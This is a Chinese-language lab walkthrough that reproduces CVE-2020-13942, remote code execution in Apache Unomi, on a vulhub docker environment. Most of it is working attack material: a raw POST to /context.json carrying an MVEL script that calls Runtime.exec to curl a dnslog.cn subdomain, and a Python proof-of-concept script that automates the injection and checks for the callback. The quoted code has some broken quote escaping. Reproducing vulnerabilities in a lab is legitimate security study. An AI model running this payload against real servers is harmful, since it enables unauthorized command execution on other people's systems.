使用vulhub,进入对应文件夹启动环境:
[root@localhost /]# cd /home/vulhub/unomi/CVE-2020-13942/ [root@localhost CVE-2020-13942]# docker-compose up -d查看端口:
[root@localhost CVE-2020-13942]# docker ps ConTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 90f4b717eb3f vulhub/unomi:1.5.1 "/docker-entrypoint.…" 23 minutes ago Up 23 minutes 0.0.0.0:8181->8181/tcp, :::8181->8181/tcp, 0.0.0.0:9443->9443/tcp, :::9443->9443/tcp cve-2020-13942_web_1 5c2f2cf5bc14 elasticsearch:7.9.3 "/tini -- /usr/local…" 23 minutes ago Up 23 minutes 9200/tcp, 9300/tcp cve-2020-13942_elasticsearch_1 [root@localhost CVE-2020-13942]#漏洞复现:
POST /context.json HTTP/1.1
Host: 192.168.10.10:8181
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 494
{
"filters": [
{
"id": "sample",
"filters": [
{
"condition": {
"parameterValues": {
"": "script::Runtime r = Runtime.getRuntime(); r.exec("curl 1c6p9a.dnslog.cn
");"
},
"type": "profilePropertyCondition"
}
}
]
}
],
"sessionId": "sample"
}
使用请求dnslog的方式验证命令执行结果。
POC编写:import requests,random,time
url = "http://192.168.10.10:8181/"
session = requests.session() # 维持session
dnslog = session.get(f"http://www.dnslog.cn/getdomain.php?t={str(random.random())}").text # 获取一个子域名
json={"filters": [{"filters": [{"condition": {"parameterValues": {"": f"script::Runtime r = Runtime.getRuntime(); r.exec("curl {dnslog}r");"}, "type": "profilePropertyCondition"}}], "id": "sample"}], "sessionId": "sample"}
requests.post(url + "context.json", json=json)
time.sleep(2)
dnslog_res = session.get(f"http://www.dnslog.cn/getrecords.php?t={str(random.random())}").text # 获取这个子域名被请求的结果
if dnslog in dnslog_res:
print("CVE-2020-13942")
pycharm运行结果:
